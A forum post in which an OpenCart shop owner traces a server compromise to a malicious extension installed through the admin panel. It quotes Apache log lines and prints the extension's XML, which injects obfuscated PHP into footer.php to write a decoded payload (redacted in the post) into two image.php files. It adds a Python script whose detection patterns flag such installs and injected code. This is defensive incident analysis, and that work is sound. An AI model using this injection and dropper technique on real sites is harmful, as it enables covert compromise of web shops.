Pretty sure I see what happened now. I have full backups of the server at random dates. I just took backups when I remembered, usually after I made progress with this OC install project. Ironically I seem to have caught this nasty script at the point where it was installed on the server through the OC extensions but before the binary was created. This is good news because it seems once the script is executed, it cleans up after itself.
From the Apache logs, here is me installing the file upload extension on April 4th:
Code:
209.59.90.220 - - [04/Apr/2019:19:48:23 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE&extension_install_id=1 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
And here is the Apache log of someone else installing some other extension on April 10th:
Code:
193.169.87.26 - - [10/Apr/2019:15:39:50 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe&extension_install_id=2 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
193.169.87.26 - - [10/Apr/2019:15:43:08 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo&extension_install_id=3 HTTP/1.1" 200 178 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
And here is the XML for the installed extension:
Code:
<?xml version="1.0" encoding="utf-8"?>
<modification>
<name><![CDATA[OCstore]]></name>
<code>OCstore</code>
<version>1.0</version>
<author>teknohiz.com</author>
<link>teknohiz.com</link>
<file path="catalog/controller/common/footer.php">
<operation error="skip">
<search><![CDATA[$data['text_newsletter'] = $this->language->get('text_newsletter');]]></search>
<add position="after"><![CDATA[
$datasss = base64_decode(gzinflate(base64_decode('
----- REMOVED ENCODED PART FOR THIS FORUM POST ---
')));
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL);
fclose($fp);
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL);
fclose($fp);
]]></add>
</operation>
<operation error="skip">
<search><![CDATA[$data['newsletter'] = $this->url->link('account/newsletter', '', true);]]></search>
<add position="after"><![CDATA[
$datasss = base64_decode(gzinflate(base64_decode('
----- REMOVED ENCODED PART FOR THIS FORUM POST ---
')));
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL);
fclose($fp);
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL);
fclose($fp);
]]></add>
</operation>
</file>
</modification>
So now I know this was done via the OC extensions and not via SSH/FTP or anything else. My guess is someone/something logged into the admin part of OC and installed this script. It wouldn't have been very hard to guess the admin password I was using; buzzing the usual passwords would have found it. And now I'll hand this server backup off to the team that manages OC, hopefully it can be useful.
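Two checks a shop owner could run against the two artifacts in this post, as an added example that is not the poster's code or part of OpenCart: one walks Apache access logs for `marketplace/install/unzip` requests from IPs other than the owner's own, and the other parses an OCMOD install.xml and flags any `<add>` block whose injected PHP decodes an encoded blob or opens a `.php` file for writing, which is exactly the shape of the footer.php modification above. The sample log lines and XML are constructed to mirror the post; the trusted IP set and the placeholder blob are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Apache combined log: ip ident user [time] "request" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
INSTALL_ROUTE = "route=marketplace/install/unzip"   # admin marketplace unpacking an extension
# Traits of the injected PHP in the post: layered decoding, and opening a .php file for writing.
SUSPECT_PHP = [re.compile(r'base64_decode\s*\(\s*gzinflate'),
               re.compile(r'''fopen\s*\([^)]*\.php['"]\s*,\s*['"]w''')]

def find_extension_installs(log_text, trusted_ips):
    """(ip, time, extension_install_id) for each marketplace unzip request from an IP
    outside trusted_ips (the shop owner's own addresses, an assumed allowlist)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or INSTALL_ROUTE not in m["path"] or m["ip"] in trusted_ips:
            continue
        ext = re.search(r'extension_install_id=(\d+)', m["path"])
        hits.append((m["ip"], m["time"], ext.group(1) if ext else None))
    return hits

def flag_ocmod_writes(xml_text):
    """Paths of <file> targets whose <add> PHP matches a SUSPECT_PHP pattern."""
    root = ET.fromstring(xml_text)
    flagged = {f.get("path") for f in root.iter("file")
               for add in f.iter("add")
               if any(p.search(add.text or "") for p in SUSPECT_PHP)}
    return sorted(flagged)

# Constructed samples modelled on the post (not the real log file or install.xml)
SAMPLE_LOG = """\
209.59.90.220 - - [04/Apr/2019:19:48:23 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=T1&extension_install_id=1 HTTP/1.1" 200 178 "-" "UA"
193.169.87.26 - - [10/Apr/2019:15:39:50 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=T2&extension_install_id=2 HTTP/1.1" 200 178 "-" "UA"
193.169.87.26 - - [10/Apr/2019:15:40:01 +0000] "GET /admin/index.php?route=common/dashboard&user_token=T2 HTTP/1.1" 200 5120 "-" "UA"
"""
SAMPLE_XML = """<?xml version="1.0" encoding="utf-8"?>
<modification><name>x</name><code>x</code>
<file path="catalog/controller/common/footer.php"><operation error="skip">
<search><![CDATA[$data['a'] = 1;]]></search><add position="after"><![CDATA[
$datasss = base64_decode(gzinflate(base64_decode('ENCODED-BLOB-PLACEHOLDER')));
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL); fclose($fp);
]]></add></operation></file>
<file path="catalog/controller/common/header.php"><operation error="skip">
<search><![CDATA[$data['b'] = 2;]]></search><add position="after"><![CDATA[$data['c'] = 3;]]></add>
</operation></file></modification>"""
if __name__ == "__main__":
    print(find_extension_installs(SAMPLE_LOG, {"209.59.90.220"}))
    print(flag_ocmod_writes(SAMPLE_XML))
```

Running the log check over the full access log with the owner's own IPs as the trusted set surfaces every third-party extension install; the XML check can be pointed at every install.xml under system/storage/marketplace (or wherever the OC version keeps unpacked extensions).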